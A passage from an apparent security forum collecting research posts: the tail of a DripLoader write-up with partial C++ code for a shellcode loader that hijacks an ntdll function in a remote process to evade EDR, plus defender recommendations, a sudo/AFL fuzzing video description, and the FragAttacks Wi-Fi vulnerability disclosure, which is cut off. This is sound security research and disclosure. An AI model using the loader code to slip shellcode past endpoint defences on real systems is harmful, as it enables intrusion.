won't be tagged on by most EDRs, but it will no longer have ntdll as it's start address which could get it detected by basic Endpoint Protection, and will get it detected by Get-InjectedThread. Steps we take figure out RVA of the function we will hijack // ntdll.dll char jmpModName[]{ 'n','t','d','l','l','.','d','l','l','\0' }; // RtlpWow64CtxFromAmd64 char jmpFuncName[]{ 'R','t','l','p','W','o','w','6','4','C','t','x','F','r','o','m','A','m','d','6','4','\0' }; LPVOID PrepEntry(HANDLE hProc, LPVOID vm_base) { unsigned char* b = (unsigned char*)&vm_base; unsigned char jmpSc[7]{ 0xB8, b[0], b[1], b[2], b[3], 0xFF, 0xE0 }; // find the export EP offset HMODULE hJmpMod = LoadLibraryExA( jmpModName, NULL, DONT_RESOLVE_DLL_REFERENCES ); if (!hJmpMod) return nullptr; LPVOID lpDllExport = GetProcAddress(hJmpMod, jmpFuncName); DWORD offsetJmpFunc = (DWORD)lpDllExport - (DWORD)hJmpMod; [...] } find base of remote ntdll and calculate AVA [...] LPVOID lpRemFuncEP{ 0 }; HMODULE hMods[1024]; DWORD cbNeeded; char szModName[MAX_PATH]; if (EnumProcessModules(hProc, hMods, sizeof(hMods), &cbNeeded)) { int i; for (i = 0; i < (cbNeeded / sizeof(HMODULE)); i++) { if (GetModuleFileNameExA(hProc, hMods[i], szModName, sizeof(szModName) / sizeof(char))) { if (strcmp(PathFindFileNameA(szModName), jmpModName)==0) { lpRemFuncEP = hMods[i]; break; } } } } lpRemFuncEP = (LPVOID)((DWORD_PTR)lpRemFuncEP + offsetJmpFunc); [...] overwrite the function prologue with a jmp [...] if (NULL == lpRemFuncEP) return nullptr; SIZE_T szWritten{ 0 }; WriteProcessMemory( hProc, lpDllExport, jmpSc, sizeof(jmpSc), &szWritten ); return lpDllExport; } CreateRemoteThread The full source and more explanations can be found on GitHub xinbailu/DripLoader Evasive shellcode loader for bypassing event-based injection detection (PoC) - xinbailu/DripLoader github.com Result 1. The activity will generate events with the following characteristics // reservations VM_ALLOC: REMOTE: 1, SIZE: 0x10000, TYPE: 0x2000, PROT: 0x01 (-) // commits VM_ALLOC: REMOTE: 1, SIZE: 0x1000, TYPE: 0x1000, PROT: 0x04 (rw) VM_WRITE: REMOTE: 1, SIZE: 0x1000 THREAD_START: REMOTE: 1, SUSPENDED: 0, ACCMSK: 0xFFFF (full), PAGE_TYPE: 0x1000000 (img), LPTHREAD_START_ROUTINE: ntdll.RtlpWow64CtxFromAmd64+0x0 2. State of the target process (assuming shellcode does not create thread) Defense recommendations Option #1: Monitor injection APIs yourself EDRs with custom rule creation (or hunting) capabilities can be used, but make sure to fully understand under what circumstances events are collected aggregations and least frequency analysis hunting queries can be used to reduce workloads for your team Sursa: https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection
      • 1
      • Thanks
  5. Let's investigate some issues we have fuzzing sudo with afl. And also explain how AFL works. After improving our fuzzing setup even more, we are finally read to start fuzzing sudo for real. Can we find the vulnerability now? https://liveoverflow.com/support Grab the files: https://github.com/LiveOverflow/pwnedit/ milek7's blog: https://milek7.pl/howlongsudofuzz/ Sudo Research Episode 02: 00:00 - Recap 00:39 - Fixing AFL Crash Using LLVM mode 03:32 - Testing the AFL Instrumented Sudo Binary 04:11 - How Fuzzing with AFL works! 06:44 - Can AFL find the crash? 08:06 - Detour: busybox and argv[0] 09:48 - How could we discover "sudoedit"? 10:47 - Can AFL find "sudoedit" through magic? 11:25 - Include argv[0] in the testcases 13:06 - Parallel Fuzzing Setup -=[ ❤️ Support ]=- → per Video: https://www.patreon.com/join/liveover... → per Month: https://www.youtube.com/channel/UClcE... -=[ 🐕 Social ]=- → Twitter: https://twitter.com/LiveOverflow/ → Website: https://liveoverflow.com/ → Subreddit: https://www.reddit.com/r/LiveOverflow/ → Facebook: https://www.facebook.com/LiveOverflow/
  6. INTRODUCTION 11 May 2021 — This website presents FragAttacks (fragmentation and aggregation attacks) which is a collection of new security vulnerabilities that affect Wi-Fi devices. An adversary that is within radio range of a victim can abuse these vulnerabilities to steal user information or attack devices. Three of the discovered vulnerabilities are design flaws in the Wi-Fi standard and therefore affect most devices. On top of this, several other vulnerabilities were discovered that are caused by widespread programming mistakes in Wi-Fi products. Experiments indicate that every Wi-Fi product is affected by at least one vulnerability and that most products are affected by several vulnerabilities. The discovered vulnerabilities affect all modern security protocols of Wi-Fi, including the latest WPA3 specification. Even the original security protocol of Wi-Fi, called WEP, is affected. This means that several of the newly discovered design flaws have been part of Wi-Fi since its release in 1997! Fortunately, the design flaws are hard to abuse because doing so requires user interaction or is only possible when using uncommon network settings. As a result, in practice the biggest concern are the programming mistakes in Wi-Fi products since several of them are trivial to exploit. The discovery of these vulnerabilities comes as a surprise, because the security of Wi-Fi has in fact significantly improved over the past years. For instance, previously we discovered the KRACK attacks, the defenses against KRACK were proven secure, and the latest WPA3 security specification has improved. Unfortunately, a feature that could have prevented one of the newly discovered design flaws was not adopted in practice, and the other two design flaws are present in a feature of Wi-Fi that was previously not widely studied. This shows it stays important to analyze even the most well-known security protocols (if you want to help, we are hiring). Additionally, it shows that it's essential to regularly test Wi-Fi products for security vulnerabilities, which can for instance be done when certifying them. To protect users, security updates were prepared during a 9-month-long coordinated disclosure that was supervised by the Wi-Fi Alliance and ICASI. If updates for your device are not yet available, you can mitigate some attacks (but not all) by assuring that websites use HTTPS and by assuring that your devices received all other available updates. DEMO The following video shows three examples of how an adversary can abuse the vulnerabilities. First, the aggregation design flaw is abused to intercept sensitive information (e.g. the victim's username and password). Second, it's shown how an adversary can exploit insecure internet-of-things devices by remotely turning on and off a smart power socket. Finally, it's demonstrated how the vulnerabilities can be abused as a stepping stone to launch advanced attacks. In particular, the video shows how an adversary can take over an outdated Windows 7 machine inside a local network. As the demo illustrates, the Wi-Fi flaws can be abused in two ways. First, under the right conditions they can be abused to steal sensitive data. Second, an adversary can abuse the Wi-Fi flaws to attack devices in someone's home network. The biggest risk in practice is likely the ability to abuse the discovered flaws to attack devices in someone's home network. For instance, many smart home and internet-of-things devices are rarely updated, and Wi-Fi security is the last line of defense that prevents someone from attacking these devices. Unfortunately, due to the discover vulnerabilities, this last line of defense can now be bypassed. In the demo above, this is illustrated by remotely controlling a smart power plug and by taking over an outdated Windows 7 machine. The Wi-Fi flaws can also be abused to exfiltrate transmitted data. The demo shows how this can be abused to learn the username and password of the victim when they use the NYU website. However, when a website is configured with HSTS to always use HTTPS as an extra layer of security, which nowadays close to 20% of websites are, the transmitted data cannot be stolen. Additionally, several browsers now warn the user when HTTPS is not being used. Finally, although not always perfect, recent mobile apps by default use HTTPS and therefore also use this extra protection. DETAILS Plaintext injection vulnerabilities Several implementation flaws can be abused to easily inject frames into a protected Wi-Fi network. In particular, an adversary can often inject an unencrypted Wi-Fi frame by carefully constructing this frame. This can for instance be abused to intercept a client's traffic by tricking the client into using a malicious DNS server as shown in the demo (the intercepted traffic may have another layer of protection though). Against routers this can also be abused to bypass the NAT/firewall, allowing the adversary to subsequently attack devices in the local Wi-Fi network (e.g. attacking an outdated Windows 7 machine as shown in the demo). How can the adversary construct unencrypted Wi-Fi frames so they are accepted by a vulnerable device? First, certain Wi-Fi devices accept any unencrypted frame even when connected to a protected Wi-Fi network. This means the attacker doesn't have to do anything special! Two of out of four tested home routers were affected by this vulnerability, several internet-of-things devices were affected, and some smartphones were affected. Additionally, many Wi-Fi dongles on Windows will wrongly accept plaintext frames when they are split into several (plaintext) fragments. Additionally, certain devices accept plaintext aggregated frames that look like handshake messages. An adversary can exploit this by sending an aggregated frame whose starts resembles a handshake message and whose second subframe contains the packet that the adversary wants to inject. A vulnerable device will first interpret this frame as a handshake message, but will subsequently process it as an aggregated frame. In a sense, one part of the code will think the frame is a handshake message and will accept it even though it's not encrypted. Another part of the code will instead see it as an aggregated frame and will process the packet that the adversary wants to inject. A plaintext aggregated frame that also looks like a handshake message ☺ Finally, several devices process broadcasted fragments as normal unfragmented frames. More problematic, some devices accept broadcast fragments even when sent unencrypted. An attacker can abuse this to inject packets by encapsulating them in the second fragment of a plaintext broadcast frame. Design flaw: aggregation attack The first design flaw is in the frame aggregation feature of Wi-Fi. This feature increases the speed and throughput of a network by combining small frames into a larger aggregated frame. To implement this feature, the header of each frame contains a flag that indicates whether the (encrypted) transported data contains a single or aggregated frame. This is illustrated in the following figure: Unfortunately, this "is aggregated" flag is not authenticated and can be modified by an adversary, meaning a victim can be tricked into processing the encrypted transported data in an unintended manner. An adversary can abuse this to inject arbitrary network packets by tricking the victim into connecting to their server and then setting the "is aggregated" flag of carefully selected packets. Practically all tested devices were vulnerable to this attack. The ability to inject packets can in turn be abused to intercept a victim’s traffic by making it use a malicious DNS server (see the demo). This design flaw can be fixed by authenticating the "is aggregated" flag. The Wi-Fi standard already contains a feature to authenticate this flag, namely requiring SPP A-MSDU frames, but this defense is not backwards-compatible and not supported in practice. Attacks can also be mitigated using an ad-hoc fix, though new attacks may remain possible. Design flaw: mixed key attack The second design flaw is in the frame fragmentation feature of Wi-Fi. This feature increases the reliability of a connection by splitting large frames into smaller fragments. When doing this, every fragment that belongs to the same frame is encrypted using the same key. However, receivers are not required to check this and will reassemble fragments that were decrypted using different keys. Under rare conditions this can be abused to exfiltrate data. This is accomplished by mixing fragments that are encrypted under different keys, as illustrated in the following figure: In the above figure, the first fragment is decrypted using a different key than the second fragment. Nevertheless, the victim will reassemble both fragments. In practice this allows an adversary to exfiltrate selected client data. This design flaw can be fixed in a backwards-compatible manner by only reassembling fragments that were decrypted using the same key. Because the attack is only possible under rare conditions it is considered a theoretical attack. Design flaw: fragment cache attack The third design flaw is also in Wi-Fi's frame fragmentation feature. The problem is that, when a client disconnects from the network, the Wi-Fi device is not required to remove non-reassembled fragments from memory. This can be abused against hotspot-like networks such as eduroam and govroam and against enterprise network where users distrust each other. In those cases, selected data sent by the victim can be exfiltrated. This is achieved by injecting a malicious fragment in the memory (i.e. fragment cache) of the access point. When the victim then connects to the access point and sends a fragmented frame, selected fragments will be combined (i.e. reassembled) with the injected fragment of the adversary. This is illustrated in the following figure: In the above figure, the adversary injects the first fragment into the fragment cache of the access point. After the adversary disconnects the fragment stays in the fragment cache and will be reassembled with a fragment of the victim. If the victim sends fragmented frames, which appears uncommon in practice, this can be abused to exfiltrate data. This design flaw can be fixed in a backwards-compatible manner by removing fragments from memory whenever disconnecting or (re)connecting to a network. Other implementation vulnerabilities Some routers will forward handshake frames to another client even when the sender hasn't authenticated yet. This vulnerability allows an adversary to perform the aggregation attack, and inject arbitrary frames, without user interaction. Another extremely common implementation flaw is that receivers do not check whether all fragments belong to the same frame, meaning an adversary can trivially forge frames by mixing the fragments of two different frames. Additionally, against several implementations it is possible to mix encrypted and plaintext fragments. Finally, some devices don't support fragmentation or aggregation, but are still vulnerable to attacks because they process fragmented frames as full frames. Under the right circumstances this can be abused to inject packets. Assigned CVE identifiers An overview of all assigned Common Vulnerabilities and Exposures (CVE) identifiers can be found on GitHub. At the time of writing, ICASI has a succinct overview containing references to additional info from vendors (the CVE links below might only become active after a few days). Summarized, the design flaws were assigned the following CVEs: CVE-2020-24588: aggregation attack (accepting non-SPP A-MSDU frames). CVE-2020-24587: mixed key attack (reassembling fragments encrypted under different keys). CVE-2020-24586: fragment cache attack (not clearing fragments from memory when (re)connecting to a network). Implementation vulnerabilities that allow the trivial injection of plaintext frames in a protected Wi-Fi network are assigned the following CVEs: CVE-2020-26145: Accepting plaintext broadcast fragments as full frames (in an encrypted network). CVE-2020-26144: Accepting plaintext A-MSDU frames that start with an RFC1042 header with EtherType EAPOL (in an encrypted network). CVE-2020-26140: Accepting plaintext data frames in a protected network. CVE-2020-26143: Accepting fragmented plaintext data frames in a protected network. Other implementation flaws are assigned the following CVEs: CVE-2020-26139: Forwarding EAPOL frames even though the sender is not yet authenticated (should only affect APs). CVE-2020-26146: Reassembling encrypted fragments with non-consecutive packet numbers. CVE-2020-26147: Reassembling mixed encrypted/plaintext fragments. CVE-2020-26142: Processing fragmented frames as full frames. CVE-2020-26141: Not verifying the TKIP MIC of fragmented frames. For each implementation vulnerability we listed the reference CVE identifier. Although each affected codebase normally receives a unique CVE, the consensus was that using the same CVE across different codebases would make communication easier. For instance, by tying one CVE to each vulnerability, a customer can now ask a vendor whether their product is affected by a specific CVE. Using a unique CVE for each codebase would complicate such questions and cause confusion. PAPER Our paper behind the attack is titled Fragment and Forge: Breaking Wi-Fi Through Frame Aggregation and Fragmentation and will be presented at USENIX Security. You can use the following bibtex entry to cite our paper: @inproceedings{vanhoef-usenix2021-fragattacks, author = {Mathy Vanhoef}, title = {Fragment and Forge: Breaking {Wi-Fi} Through Frame Aggregation and Fragmentation}, booktitle = {Proceedings of the 30th {USENIX} Security Symposium}, year = {2021}, month = {August}, publisher = {{USENIX} Association} } USENIX Security Presentation The pre-recorded presentation made for USENIX Security can already be viewed online. Note that the target audience of this presentation are academics and IT professionals: Extra Documents An overview of all attacks and their preconditions. It also contains two extra examples on how an adversary can: (1) abuse packet injection vulnerabilities to make a victim use a malicious DNS; and (2) how packet injection can be abused to bypass the NAT/firewall of a router. Slides illustrating how the aggregation attack (CVE-2020-24588) works in practice. Performing this attack requires tricking the victim into connecting to the adversary's server. This can be done by making the victim download an image from the adversary’s server. Note that JavaScript code execution on the victim is not required. Detailed slides giving an in-depth explanation of each discovered vulnerability. Overview slides illustrating only the root cause of each discovered vulnerability. TOOLS A tool was made that can test if clients or APs are affected by the discovered design and implementations flaws. It can test home networks and enterprise networks where authentication is done using, e.g., PEAP-MSCHAPv2 or EAP-TLS. The tool supports over 45 test cases and requires modified drivers in order to reliable test for the discovered vulnerabilities. Without modified drivers, one may wrongly conclude that a device is not affected while in reality it is. A live USB image is also available. This image contains pre-installed modified drivers, modified firmware for certain Atheros USB dongles, and a pre-configured Python environment for the tool. Using a live image is useful when you cannot install the modified drivers natively (and using a virtual machine can be unreliable for some network cards). Apart from a tool to test if a device is vulnerable I also made proof-of-concepts to exploit weaknesses. Because not all devices currently have received updates these attacks scripts will be released at a later point if deemed useful. Q&A How can I contact you? Are you looking for PhD students? Can I reuse the images on this website? Why did nobody notice the aggregation design flaw before? Why was the defense against the aggregation attack (CVE-2020-24588) not adopted? My device isn't patched yet, what can I do? Why is Wi-Fi security important? We already have HTTPS. Will using a VPN prevent attacks? How did you discover this? How sure are you that all Wi-Fi devices are affected? Does this mean every Wi-Fi device is trivial to attack? How many networks use fragmentation? How many networks periodically refresh the pairwise session key? Isn't is irresponsible to release tools to perform the attacks? Where are all the attack tools? Do you have example network captures of the vulnerabilities? How long will you maintain the driver patches needed to run the test scripts? Why are so many implementations vulnerable to be non-consecutive PN attack? Why are so many implementations vulnerable to the mixed plaintext/encrypted fragment attack? Can an implementation be vulnerable to a cache attack without being vulnerable to a mixed key attack? Can the mixed-key attack be prevented in a backward-compatible manner? Is the old WPA-TKIP protocol also affected by the design flaws? Is the ancient WEP protocol also affected by the design flaws? Can fragmentation attacks be preventing by disallowing small delays between fragments? Are patches for Linux available? Did others also discover the plaintext injection issue (CVE-2020-26140)? Why do you use the same CVE for implementation issues in multiple different codebases? Why was the embargo so long? How did you monitor for leaks during the embargo? Are these vulnerabilities being exploited in practice? Why did Microsoft already fix certain vulnerabilities on March 9, 2021? Is the "Treating fragments as full frames" flaw (CVE-2020-26142) also applicable to APs? Can APs be vulnerable to attacks that send broadcast frames? Why are some of the tested devices so old? How did you make macOS switch to the malicious DNS server in the demonstration? Isn't nyu.edu using HSTS to prevent these kind of attacks? How do I reproduce the BlueKeep attack shown in the demonstration? How can I contact you? You can reach Mathy Vanhoef on twitter at @vanhoefm or by emailing mathy.vanhoef@nyu.edu. Are you looking for PhD students? Yes! Mathy Vanhoef will be starting as a professor at KU Leuven University (Belgium) later this year and is looking for a PhD student. The precise topic you want to work on can be discussed. If you're a master student at KU Leuven you can also contact me to discuss a Master's thesis topic. Note that the DistriNet group at KU Leuven is also recruiting in security-related research fields. If you want to do network research at New York University Abu Dhabi in the Cyber Security & Privacy (CSP) team where the FragAttacks research was carried out, you can contact Christina Pöpper. Can I reuse the images on this website? Yes, you can use the logo, illustrations of the aggregation design flaw (mobile version), illustrations of the mixed key design flaw (mobile version), and illustrations of the fragment cache design flaw (mobile version). Thanks goes to Darlee Urbiztondo for designing the logo. You can find more of her awesome graphic works here. Why did nobody notice the aggregation design flaw before? When the 802.11n amendment was being written in 2007, which introduced supported for aggregated (A-MSDU) frames, several IEEE members noticed that the "is aggregated" flag was not authenticated. Unfortunately, many products already implemented a draft of the 802.11n amendment, meaning this problem had to be addressed in a backwards-compatible manner. The decision was made that devices would advertise whether they are capable of authenticating the "is aggregated" flag. Only when devices implement and advertise this capability is the "is aggregated" flag protected. Unfortunately, in 2020 not a single tested device supported this capability, likely because it was considered hard to exploit. To quote a remark made back in 2007: "While it is hard to see how this can be exploited, it is clearly a flaw that is capable of being fixed." In other words, people did notice this vulnerability and a defense was standardized, but in practice the defense was never adopted. This is a good example that security defenses must be adopted before attacks become practical. Why was the defense against the aggregation attack (CVE-2020-24588) not adopted? Likely because it was only considered a theoretic vulnerability when the defense was created. To quote a remark made back in 2007: "While it is hard to see how this can be exploited, it is clearly a flaw that is capable of being fixed." Additionally, the threat model that was used in the aggregation attack, were the victim is induced into connecting to the adversary's server, only become widely accepted in 2011 after the disclosure of the BEAST attack. In other words, the threat model was not yet widely known back in 2007 when the IEEE added the optional feature that would have prevented the attack. And even after this threat model became more common, the resulting attack isn't obvious. My device isn't patched yet, what can I do? First, it's always good to remember general security best practices: update your devices, don't reuse your passwords, make sure you have backups of important data, don't visit shady websites, and so on. In regards to the discovered Wi-Fi vulnerabilities, you can mitigate attacks that exfiltrate sensitive data by double-checking that websites you are visiting use HTTPS. Even better, you can install the HTTPS Everywhere plugin. This plugin forces the usage of HTTPS on websites that are known to support it. To mitigate attacks where your router's NAT/firewall is bypassed and devices are directly attacked, you must assure that all your devices are updated. Unfortunately, not all products regularly receive updates, in particular smart or internet-of-things devices, in which case it is difficult (if not impossible) to properly secure them. More technically, the impact of attacks can also be reduced by manually configuring your DNS server so that it cannot be poisoned. Specific to your Wi-Fi configuration, you can mitigate attacks (but not fully prevent them) by disabling fragmentation, disabling pairwise rekeys, and disabling dynamic fragmentation in Wi-Fi 6 (802.11ax) devices. Why is Wi-Fi security important? We already have HTTPS. These days a lot of websites and apps use HTTPS to encrypt data. When using HTTPS, an adversary cannot see the data you are transmitting even when you are connected to an open Wi-Fi network. This also means that you can safely use open Wi-Fi hotspots as long as you keep your devices up-to-date and as long as you assure that websites are using HTTPS. Unfortunately, not all websites require the usage of HTTPS (i.e. they're not using HSTS), meaning they remain vulnerable to possible attacks. At home, the security of your Wi-Fi network is also essential. An insecure network means that others might be able to connect to the internet through your home. Additionally, more and more devices are using Wi-Fi to transfer personal files in your local network without an extra layer of protection (e.g. when printing files, smart display screens, when sending files to a local backup storage, digital photo stands, and so on). More problematic, a lot of internet-of-things devices have tons of security vulnerabilities that can be exploited if an adversary can communicate with them. The main thing that prevents an adversary from exploiting these insecure internet-of-things devices is the security of your Wi-Fi network. It therefore remains essential to have strong encryption and authentication at the Wi-Fi layer. At work, the security of Wi-Fi is also essential for the same reasons as mentioned above. Additionally, many companies will automatically allow access to sensitive services when a user (or adversary) is able to connect to the Wi-Fi network. Therefore strong Wi-Fi security is also essential in a work setting. Will using a VPN prevent attacks? Using a VPN can prevent attacks where an adversary is trying to exfiltrate data. It will not prevent an adversary from bypassing your router's NAT/firewall to directly attack devices. How did you discover this? The seeds of this research were already planted while I was investigating the KRACK attack. At that time, on 8 June 2017 to be precise, I wrote down some notes to further investigate (de)fragmentation support in Linux. In particular, I thought there might be an implementation vulnerability in Linux. However, a single unconfirmed implementation flaw isn't too spectacular research-wise, so after disclosing the KRACK attack I decided to work on other research instead. The idea of inspecting (de)fragmentation in Wi-Fi, and determining whether there really was a vulnerability or not, was always at the back of my mind though. Fast-forward three years later, and after gaining some additional ideas to investigate, closer inspection confirmed some of my hunches and also revealed that these issues were more widespread than I initially assumed. And with some extra insights I also discovered all the other vulnerabilities. Interestingly, this also shows the advantage of fleshing out ideas before rushing to publish (though actually finishing the paper before submission was still a race against time..). How sure are you that all Wi-Fi devices are affected? In experiments on more than 75 devices, all of them were vulnerable to one or more of the discovered attacks. I'm curious myself whether all devices in the whole world are indeed affected though! To find this out, if you find a device that isn't affected by at least one of the discovered vulnerabilities, let me know. Also, if your company provides Wi-Fi devices and you think that your product was not affected by any of the discovered vulnerabilities, you can send your product to me. Once I confirmed that it indeed was not affected by any vulnerabilities the name of your product and company will be put here! Note that I do need a method to assure that I'm indeed testing a version of the product that was available before the disclosure of the vulnerabilities (and that you didn't silently patch some vulnerabilities). Does this mean every Wi-Fi device is trivial to attack? The design issues are, on their own, tedious to exploit in practice. Unfortunately, some of the implementation vulnerabilities are common and trivial to exploit. Additionally, by combining the design issues with certain implementation issues, the resulting attacks become more serious. This means the impact of our findings depends on the specific target. Your vendor can inform you what the precise impact is for specific devices. In other words, for some devices the impact is minor, while for others it's disastrous. How many networks use fragmentation? By default devices don't send fragmented frames. This means that the mixed key attack and the fragment cache attack, on their own, will be hard to exploit in practice, unless Wi-Fi 6 is used. When using Wi-Fi 6, which is based on the 802.11ax standard, a device may dynamically fragment frames to fill up available airtime. How many networks periodically refresh the pairwise session key? By default access points don't renew the pairwise session key, even though some may periodically renew the group key. This means that the default mixed key attack as described in the paper is only possible against networks that deviate from this default setting. Isn't is irresponsible to release tools to perform the attacks? The test tool that we released can only be used to test whether a device is vulnerable. It cannot be used to perform attacks: an adversary would have to write their own tools for that. This approach enables network administrators to test if devices are affected while reducing the chance of someone abusing the released code. Where are all the attack tools? The code that has currently been released focusses on detecting vulnerable implementations. The proof-of-concepts scripts that perform actual attacks are not released to provide everyone with more time to implement and deploy patches. Once a large enough fraction of devices has been patched, and if deemed necessary and/or beneficial, the attack script will be publicly released as well. Do you have example network captures of the vulnerabilities? There are example network captures of the test tool that illustrate the root causes of several vulnerabilities. How long will you maintain the driver patches needed to run the test scripts? The modifications to certain drivers have been submitted upstream to Linux meaning they will be maintained by the Linux developers themselves. The patches to the Intel driver have not been submitted upstream because they're a bit hacky. Concretely, this means that drivers such as ath9k_htc will be supported out of the box, while for Intel devices you will have to use patched drivers and I'm not sure how much time I'll have to maintain those. Why are so many implementations vulnerable to be non-consecutive PN attack? That's a good question. I'm not sure why so many developers missed this. This widespread implementation vulnerability does highlight that leaving important cryptographic operations up to developers is not ideal. Put another way, it might have been better if the standard required an authenticity check over the reassembled frame instead. That would also better follow the principle of authenticated encryption. Why are so many implementations vulnerable to the mixed plaintext/encrypted fragment attack? The 802.11 standard states in section 10.6: "If security encapsulation has been applied to the fragment, it shall be deencapsulated and decrypted before the fragment is used for defragmentation of the MSDU or MMPDU". There is unfortunately no warning that unencrypted fragments should be dropped. And there are no recommend checks that should be performed when reassembling two (decrypted) fragments. Can an implementation be vulnerable to a cache attack without being vulnerable to a mixed key attack? Yes, although this is unlikely to occur in practice. More technically, let's assume that an implementation tries to prevent mixed key attacks by: (1) assigning an unique key ID to every fragment; (2) incrementing this key ID whenever the pairwise transient key (PTK) is updated; and (3) assuring all fragments were decrypted under the same key ID. Unfortunately, in that case cache attacks may still be feasible. In particular, if under this defense key IDs are reused after (re)connecting to a network, for example because they are reset to zero, fragments that are decrypted using a different key may still be assigned the same key ID. As a result, cache attacks remain possible, because the fragments will still be reassembled as they have the same key ID. Can the mixed-key attack be prevented in a backward-compatible manner? Strictly speaking not, because the 802.11 standard does not explicitly require that a sender encrypts all fragments of a specific frame under the same key. Fortunately, all implementations that we tested did encrypt all fragments using the same key, at least under the normal circumstances that we tested, meaning in practice the mixed key attack can be prevented without introducing incompatibilities. Is the old WPA-TKIP protocol also affected by the design flaws? Strictly speaking not, though implementations can still be vulnerable. Note that TKIP should not be used because it is affected by other more serious security flaws. Additionally, TKIP has been deprecated by the Wi-Fi Alliance. The TKIP protocol is not affected by the fragmentation-based design flaws (CVE-2020-24587 and CVE-2020-24586) because it verifies the authenticity of the full reassembled frame. This is in contrast to CCMP and GCMP, which only verify the authenticity of individual fragments, and rely on sequential packet numbers to securely reassemble the individual (decrypted) fragments. Additionally, TKIP is not affected by the aggregation design flaw (CVE-2020-24588) because a receiver is supposed to drop A-MSDUs that are encrypted using TKIP. Indeed, in Section "12.9.2.8 Per-MSDU/Per-A-MSDU Rx pseudocode" of the 802.11-2016 standard it's specified that when using TKIP only normal MSDU frames are accepted. Unfortunately, some implementations don't verify the authenticity of fragmented TKIP frames, and some accept aggregated frames (i.e. A-MSDUs) even when encrypted using TKIP. This unfortunately means that in practice TKIP implementations may still be vulnerable. Is the ancient WEP protocol also affected by the design flaws? Yes. The WEP protocol is so horrible that it doesn't even try to verify the authenticity of fragmented frames. This means an adversary can trivially perform aggregation-based attacks against WEP. Similar to TKIP, the WEP protocol is not affected by the aggregation design flaw (CVE-2020-24588) because a receiver is supposed to drop A-MSDUs that are encrypted using WEP. Nevertheless, in practice several WEP implementations do accept A-MSDUs and therefore are still vulnerable. Finally, in case you've been living under a rock, stop using WEP, it's known to be a horrible security protocol. Can fragmentation attacks be preventing by disallowing small delays between fragments? This would make exploiting possible vulnerabilities harder and perhaps in some cases practically infeasible. Unfortunately this doesn't provide any guarantees though. I therefore recommend to fix the root cause instead. Are patches for Linux available? Yes! During the embargo I helped write some patches for the Linux kernel. This means an updated Linux kernel should (soon) be available for actively supported Linux distributions. Did others also discover the plaintext injection issue (CVE-2020-26140)? During the embargo I was made aware that Synopsys also discovered the plaintext injection vulnerability (CVE-2020-26140) in access points. They found that Mediatek, Realtek, and Qualcomm were affected, and to cover these three implementations the identifiers CVE-2019-18989, CVE-2019-18990, and CVE-2019-18991 were respectively assigned. During the FragAttacks research I found that the same vulnerability was (still) present in other access points and that clients can be vulnerable to a similar attack. Additionally, and somewhat surprisingly, I also found that some devices reject normal (non-fragmented) plaintext frames but do accept fragmented plaintext frames (CVE-2020-26143). Why do you use the same CVE for implementation issues in multiple different codebases? Implementation-specific vulnerabilities usually get their own independent CVE identifier for each different codebase. However, because the same implementation issues seem to be present across multiple vendors it would make more sense to have a single CVE identifier for each common implementation issue. After all, the main purpose of CVE identifiers is to provide a single, common ID to be used across vendors to identify the same vulnerability. We therefore think it makes sense to assign only a single CVE identifier to each implementation issues. This enables vendors and customers to easily reference an implementation vulnerability and, for instance, check whether certain products are affected by one of the discovered vulnerabilities. Why was the embargo so long? The disclosure was delayed by two months in consensus with ICASI and the Wi-Fi Alliance. The decision on whether to disclose fast, or to provide more time to write and create patches, wasn't easy. At the time, the risk of leaks appeared low, and the advantage of delaying appeared high. Additionally, we were prepared to immediately disclose in case details would accidently leak publicly. Another aspect that influenced my decision was the current situation, meaning COVID-19, which among other things made it harder to safely get access to physical places/labs to test patches. How did you monitor for leaks during the embargo? During the last two months of the embargo, we were prepared to make the research public whenever information would seemed to be leaking. To detect leaks I personally searched for relevant keywords (CVE numbers, paper title, script names) on Google and social media such as Twitter. The Wi-Fi Alliance and ICASI were also monitoring for leaks (e.g. if questions came from people that shouldn't have known about it). This can detect innocent leaks. Detecting malicious leaks or usage of the vulnerabilities in stealthy attacks is a much harder problem (if even possible at all). If you know about cases where some information was (accidently) leaked, it would be useful to know about that so that I can better estimate the impact of having long embargos. Any information you provide about this will remain confidential. This information will help me in future decision when weighing the option of a longer embargo versus disclosing research even when several vendors don't have patches ready (i.e. it won't be used to point fingers). Are these vulnerabilities being exploited in practice? Not that we are aware of. Because some of the design flaws took so long to discover my hunch is that those have not been previously exploited in the wild. But it is difficult to monitor whether one of the discovered vulnerabilities have been exploited in the past or are currently being exploited. So it is hard to give a definite answer to this question. Why did Microsoft already fix certain vulnerabilities on March 9, 2021? The original disclosure date was March 9, 2021. Roughly one week beforehand it was decided to delay the disclosure. At this time Microsoft had already committed to shipping certain patches on March 9. I agreed that already releasing certain patches without providing information about the vulnerabilities was, at that point, an acceptable risk. Put differently, the advantages of delaying the disclosure appeared to outweigh the risk that someone would reverse engineer the patches and rediscover certain attacks. Is the "Treating fragments as full frames" flaw (CVE-2020-26142) also applicable to APs? Yes, access points can also be vulnerable. In particular, during additional experiments that I recently performed, the vulnerability was also present in OpenBSD when it acted as an access point. Can APs be vulnerable to attacks that send broadcast frames? Yes, although they are less likely to be vulnerable compared to clients. This is because under normal circumstances clients never send a frame to the AP with a broadcast receiver address. Instead, clients first send broadcast/multicast network packets as unicast Wi-Fi frames to the AP, and the AP then broadcasts these packets to all connected clients. As a result, many APs will simply ignore Wi-Fi frames with a broadcast receiver address, because in normal networks those frames are only meant for clients. Why are some of the tested devices so old? I also tested some very old Wi-Fi devices and dongles to estimate how long the discovered vulnerabilities have been present in the wild. Note that some old devices may remain in use for a long time, for example, expensive medical or industrial equipment that is rarely replaced. How did you make macOS switch to the malicious DNS server in the demonstration? After injecting the ICMPv6 Router Advertisement with the malicious DNS server, macOS won't immediately use this DNS server. This is because macOS will only switch to the malicious DNS server if its current (primary) DNS server is no longer responding. To force this to happen, we briefly block all traffic towards the victim. This causes macOS to switch to the malicious DNS server. Isn't nyu.edu using HSTS to prevent these kind of attacks? Websites can use HSTS to force browsers to always use HTTPS encryption when visiting a website. This prevents the attack that was shown in our demo. Unfortunately, the website of NYU at the time did not properly configure HSTS. More technically, some subdomains such as globalhome.nyu.edu do instruct the browser to use HSTS by including the following header in responses: strict-transport-security: max-age=31536000 ; includeSubDomains Unfortunately, other subdomains such as shibboleth.nyu.edu remove HSTS by including the following header in responses: Strict-Transport-Security: max-age=0 Combined with other configuration decisions, this meant that when a user would type nyu.edu in their browser, the initial request was sent in plaintext and therefore could be intercepted by an adversary. Note that NYU has been informed of this issue and is investigating it. How do I reproduce the BlueKeep attack shown in the demonstration? First, when using the NAT punching technique, it is essential that 